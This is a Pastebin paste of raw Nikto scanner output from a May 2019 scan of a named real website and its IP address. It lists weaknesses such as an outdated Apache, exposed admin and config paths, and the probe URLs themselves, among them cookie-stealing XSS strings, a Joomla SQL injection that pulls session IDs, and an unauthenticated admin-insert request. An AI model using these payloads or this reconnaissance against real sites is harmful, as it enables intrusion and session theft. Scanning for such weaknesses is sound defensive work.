Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ~/decrypted_private/nikto/program (master) $
- pi@wwwXyZ ~/decrypted_private/nikto/program (master) $ perl nikto.pl -host http://www.greencard.md
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 138.201.190.89
- + Target Hostname: www.greencard.md
- + Target Port: 80
- + Start Time: 2019-05-10 17:42:37 (GMT3)
- ---------------------------------------------------------------------------
- + Server: Apache/2.4.18
- + Cookie PHPSESSID created without the httponly flag
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + "robots.txt" contains 1 entry which should be manually viewed.
- + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.34). Apache 2.2.34 is the EOL for the 2.x branch.
- + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + /./: Appending '/./' to a directory allows indexing
- + //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
- + OSVDB-122: /: Fasttrack can give a directory listing if issued 'get' instead of 'GET'
- + /: Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher.
- + OSVDB-576: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.
- + /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-50553: /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-50553: /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /config.php: PHP Config file may contain database IDs and passwords.
- + OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
- + OSVDB-25497: /index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
- + OSVDB-12606: /index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
- + OSVDB-119: /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
- + OSVDB-119: /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
- + OSVDB-2790: /index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-3092: /admin/: This might be interesting...
- + OSVDB-3092: /manual/: Web server manual found.
- + OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3233: /icons/README: Apache default file found.
- + /admin/home.php: Admin login page/section found.
- + /admin/login.php: Admin login page/section found.
- + /ur-admin.html: Admin login page/section found.
- + /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
- + OSVDB-81817: /?q[]=x: Drupal 7 contains a path information disclosure
- + /server-status: Apache server-status interface found (protected/forbidden)
- + /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a): Joomla is vulnerable to a SQL injection which can lead to administrator access. https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0
- + /index.php: Piwik Analytics login found.
- + 8846 requests: 0 error(s) and 35 item(s) reported on remote host
- + End Time: 2019-05-10 17:54:17 (GMT3) (700 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- pi@wwwXyZ ~/decrypted_private/nikto/program (master) $ packet_write_wait: Connection to 80.245.88.57 port 22: Broken pipe
- $
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement